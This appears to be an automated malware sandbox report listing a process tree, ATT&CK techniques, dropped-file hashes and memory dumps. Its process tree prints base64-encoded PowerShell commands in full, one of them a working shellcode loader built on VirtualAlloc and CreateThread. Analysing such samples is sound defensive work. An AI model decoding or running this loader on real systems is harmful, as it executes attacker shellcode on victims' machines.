HEAIAA4ACkAewAkAGsAdABjAFUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB0AGMAVQAgACQASQA5AE0AOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABJADkATQA5ACAAJABlACIAOwB9AA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABQAHkAeAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFAAeQB4ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADkALAAwAHgAYQBiACwAMAB4AGEAOAAsADAAeABhAGMALAAwAHgAZAA5ACwAMAB4AGUAZQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBhACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANwAyACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANwAyACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAZgAzACwAMAB4ADUANwAsADAAeAA0AGEALAAwAHgANQA5ACwAMAB4AGYAZgAsADAAeAA0ADAALAAwAHgAMAA0ACwAMAB4AGEAMgAsADAAeABmAGYALAAwAHgAOQAwACwAMAB4ADcAYgAsADAAeAA5ADIALAAwAHgAMgBkACwAMAB4AGYANAAsADAAeABmADAALAAwAHgAOAA2ACwAMAB4AGUAMQAsADAAeAA3AGMALAAwAHgAZQAzACwAMAB4AGEAYwAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4ADYANwAsADAAeABlADAALAAwAHgANAA3ACwAMAB4ADAAMAAsADAAeAAwADUALAAwAHgAMgBkACwAMAB4ADUANgAsADAAeABlADkALAAwAHgAZQA1ACwAMAB4ADkAYQAsADAAeABkADIALAAwAHgAMwAzACwAMAB4AGMAYgAsADAAeAAyADQALAAwAHgANABlACwAMAB4ADAANwAsADAAeAA0AGEALAAwAHgAZAA5ACwAMAB4ADgAYwAsADAAeAA1ADQALAAwAHgAYQBjACwAMAB4AGUAMAAsADAAeAA1AGYALAAwAHgAYQA5ACwAMAB4AGEAZAAsADAAeAAyADUALAAwAHgAMQA2ACwAMAB4AGMANwAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAYwBmACwAMAB4AGUAYwAsADAAeAA3ADQALAAwAHgAZgAwACwAMAB4AGQAMwAsADAAeAAwAGQALAAwAHgANQBhACwAMAB4ADcAZQAsADAAeAA2AGIALAAwAHgANwA2ACwAMAB4AGQAZgAsADAAeAA0ADEALAAwAHgAMQA4ACwAMAB4AGMAYQAsADAAeABkAGUALAAwAHgAOQAxACwAMAB4AGIAMQAsADAAeAA1ADkALAAwAHgAYQA4ACwAMAB4ADAAOQAsADAAeABiADkALAAwAHgAMAA2ACwAMAB4ADAAOAAsADAAeAAyAGIALAAwAHgANgBlACwAMAB4ADMAMwAsADAAeAA4ADEALAAwAHgANQBmACwAMAB4AGEAYwAsADAAeAAwAGQALAAwAHgAZQBlACwAMAB4AGUAOQAsADAAeAA0ADcALAAwAHgANQA5ACwAMAB4ADkAYgAsADAAeABlAGIALAAwAHgAOAAxACwAMAB4ADkAMwAsADAAeAA1AGIALAAwAHgAMgBhACwAMAB4AGUAMgAsADAAeABkADkALAAwAHgAZgA3ACwAMAB4AGEAYwAsADAAeAAzAGEALAAwAHgAZAA5ACwAMAB4AGUANwAsADAAeABkAGEALAAwAHgAMwAwACwAMAB4ADEAOQAsADAAeAA5AGEALAAwAHgAZABjACwAMAB4ADgAMgAsADAAeAA2ADMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAxADUALAAwAHgAYwAzACwAMAB4ADAAMwAsADAAeABjAGEALAAwAHgAZgAxACwAMAB4AGYANQAsADAAeABjADAALAAwAHgAOABkACwAMAB4ADcAMgAsADAAeABmADkALAAwAHgAYQBkACwAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAMQBlACwAMAB4ADMAMAAsADAAeAAwAGUALAAwAHgANQA2ACwAMAB4ADEAYQAsADAAeABiADkALAAwAHgAYgAxACwAMAB4AGIAOQAsADAAeABhAGEALAAwAHgAZgA5ACwAMAB4ADkANQAsADAAeAAxAGQALAAwAHgAZgA2ACwAMAB4ADUAYQAsADAAeABiADcALAAwAHgAMAA0ACwAMAB4ADUAMgAsADAAeAAwAGQALAAwAHgAYwA4ACwAMAB4ADUANwAsADAAeAAzAGEALAAwAHgAZgAyACwAMAB4ADYAYwAsADAAeAAxADMALAAwAHgAYQA5ACwAMAB4AGUANQAsADAAeAAxADEALAAwAHgAZABjACwAMAB4ADMAMQAsADAAeAAwAGEALAAwAHgANABjACwAMAB4ADQAYgAsADAAeABmAGQALAAwAHgAYwA2ACwAMAB4ADYAZgAsADAAeAA4AGIALAAwAHgANgA5ACwAMAB4ADUAMQAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADMANgAsADAAeABjADkALAAwAHgAOABiACwAMAB4AGYAMQAsADAAeABiAGYALAAwAHgAZAA3ACwAMAB4ADQAYwAsADAAeAA4ADMALAAwAHgAYQA4ACwAMAB4AGUAOAAsADAAeAA4ADMALAAwAHgAMgBiACwAMAB4AGIAOAAsADAAeAAxADcALAAwAHgAMgA0ACwAMAB4ADQAYwAsADAAeAA5ADAALAAwAHgAZAAzACwAMAB4ADcAMAAsADAAeAAxAGMALAAwAHgAOABhACwAMAB4AGYAMgAsADAAeABmADgALAAwAHgAZgA3ACwAMAB4ADQAYQAsADAAeABmAGIALAAwAHgAMgBjACwAMAB4ADYAZAAsADAAeAA0ADEALAAwAHgANgBiACwAMAB4ADAAZgAsADAAeABkAGEALAAwAHgAZQAxACwAMAB4AGUAYQAsADAAeABlADcALAAwAHgAMQA5ACwAMAB4ADAAYQAsADAAeABlADgALAAwAHgAYQAwACwAMAB4ADkANAAsADAAeABlAGMALAAwAHgAYQAwACwAMAB4ADEAZQAsADAAeABmADcALAAwAHgAYQAwACwAMAB4ADAAMAAsADAAeABjAGYALAAwAHgAYgA3ACwAMAB4ADEAMAAsADAAeABlADgALAAwAHgAMAA1ACwAMAB4ADMAOAAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4ADIANgAsADAAeAA5ADIALAAwAHgAZQA3ACwAMAB4AGEAMgAsADAAeABjADkALAAwAHgANABiACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgANwAzACwAMAB4AGQANgAsADAAeAAyAGIALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgANQAxACwAMAB4ADMAYgAsADAAeABmADYALAAwAHgAZQAzACwAMAB4AGEANgAsADAAeABmADUALAAwAHgAZgBmACwAMAB4ADgAZQAsADAAeABiADQALAAwAHgANgAxACwAMAB4AGYAMAAsADAAeABjADQALAAwAHgAZQA3ACwAMAB4ADIANwAsADAAeAAwAGYALAAwAHgAZgAzACwAMAB4ADgAMgAsADAAeABjADcALAAwAHgAOAA1ACwAMAB4AGYAOAAsADAAeAAwADQALAAwAHgAOQAwACwAMAB4ADMAMQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4AGQANgAsADAAeAA5AGQALAAwAHgAZgBjACwAMAB4ADUANwAsADAAeAA2AGQALAAwAHgAMQA3ACwAMAB4ADYAOQAsADAAeAAxADgALAAwAHgAMQA5ACwAMAB4ADUAOAAsADAAeAA3AGQALAAwAHgAOQA4ACwAMAB4AGQAOQAsADAAeAAwAGUALAAwAHgAMQA3ACwAMAB4ADkAOAAsADAAeABiADEALAAwAHgAZgA2ACwAMAB4ADQAMwAsADAAeABjAGIALAAwAHgAYQA0ACwAMAB4AGYAOAAsADAAeAA1ADkALAAwAHgANwBmACwAMAB4ADcANQAsADAAeAA2AGQALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAAyAGEALAAwAHgAMgA2ACwAMAB4ADAAYQAsADAAeABkADQALAAwAHgAMQA1ACwAMAB4ADAAMAAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADcAMAAsADAAeAA5ADAALAAwAHgAZQA5ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAZQA2ACwAMAB4ADAAMwAsADAAeABjADIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGQATwBIAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABkAE8ASAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAZABPAEgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1896
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2348
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F0A.tmp" "c:\Users\Admin\AppData\Local\Temp\xf4jrptd\CSC94DF806A913F4A66B93AB611688E484B.TMP"
        6⤵
        
        PID:2148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES4F0A.tmp

Filesize
1KB

MD5
709dfc10d9b8d54e429407f95a75f529

SHA1
a3c00faf2594622d8dde4bc9cc0a8897285f28b2

SHA256
f258c05c2cfff69d29ca782a6a7a8ff68c211aa7adc90408bb54d784f16d84da

SHA512
36bbdc8e8f691e5534b2db5fdea5004c272212e0494c0a72a94419e2ad11b50582855cee5b995bf396d432f273cba66d845c72a94606253adbd9061f1864f566

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o4di4z1c.z5g.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.dll

Filesize
3KB

MD5
1454ccec910d4fc8f29103e737a2d8bb

SHA1
c497f3392a4b743db8c703f6c3611d52bd6838f2

SHA256
ed6a866c20ab33166e5b8ef1fa5d16c73f57aef2e667644bfd54b6960d8c7d8e

SHA512
fdaba9bc1559106812e93be91b11413595705ba95378867a17a6ee8cb71946cffd21d0f549c97ca6816e15a0ba07160cac6521efb7dd072d0dcd84b62c53b4a8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xf4jrptd\CSC94DF806A913F4A66B93AB611688E484B.TMP

Filesize
652B

MD5
339996f6c731ccdf41bf1b38ec7d3f76

SHA1
7397eb2f415c73d2ec6799a67c73ac3e3e3f382b

SHA256
6190466ee0ba64a08b8670add1a10289a9c6aab6ea9e7dc4037d6b1c3fc0eea9

SHA512
8a7100953106afd221e7c2130a9caa1c2e97b73554ef1fdd6d9beb8a380403395166800d1997bace99d01a0e0f013a7dabb1133b0f36bf07089672ba14501f2b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.cmdline

Filesize
369B

MD5
1b1f1112c06e556df074221940af90e0

SHA1
0a2b467ce09ad6af036eb0b5d4952addb171dd5a

SHA256
e3a47020301b443b26d6450097d04056002e230505419d8ffeb9a026b7d28e2c

SHA512
c77935e8a20d14b4280d8f836fca5344b2afa5fe84a33889240204fdc88872e18feff9c3e8f7506a866082bdea86900146752ca8969d85ad0b309b6f4a325a49

Download Submit
memory/1728-0-0x00007FF7A2E00000-0x00007FF7A2E23000-memory.dmp

Filesize
140KB

Download
memory/1896-40-0x0000000006100000-0x0000000006454000-memory.dmp

Filesize
3.3MB

Download
memory/1896-43-0x0000000007E20000-0x000000000849A000-memory.dmp

Filesize
6.5MB

Download
memory/1896-26-0x0000000003000000-0x0000000003036000-memory.dmp

Filesize
216KB

Download
memory/1896-27-0x0000000005740000-0x0000000005D68000-memory.dmp

Filesize
6.2MB

Download
memory/1896-29-0x0000000005F20000-0x0000000005F86000-memory.dmp

Filesize
408KB

Download
memory/1896-30-0x0000000005F90000-0x0000000005FF6000-memory.dmp

Filesize
408KB

Download
memory/1896-28-0x0000000005630000-0x0000000005652000-memory.dmp

Filesize
136KB

Download
memory/1896-59-0x00000000077C0000-0x00000000077C1000-memory.dmp

Filesize
4KB

Download
memory/1896-41-0x00000000065E0000-0x00000000065FE000-memory.dmp

Filesize
120KB

Download
memory/1896-42-0x0000000006630000-0x000000000667C000-memory.dmp

Filesize
304KB

Download
memory/1896-44-0x0000000006B20000-0x0000000006B3A000-memory.dmp

Filesize
104KB

Download
memory/1896-57-0x0000000006B90000-0x0000000006B98000-memory.dmp

Filesize
32KB

Download
memory/2572-23-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

Filesize
10.8MB

Download
memory/2572-25-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

Filesize
10.8MB

Download
memory/2572-24-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

Filesize
10.8MB

Download
memory/2572-62-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

Filesize
10.8MB

Download
memory/3020-13-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

Filesize
10.8MB

Download
memory/3020-12-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

Filesize
10.8MB

Download
memory/3020-8-0x00000238BA170000-0x00000238BA192000-memory.dmp

Filesize
136KB

Download
memory/3020-1-0x00007FFAEE693000-0x00007FFAEE695000-memory.dmp

Filesize
8KB

Download
memory/3020-60-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads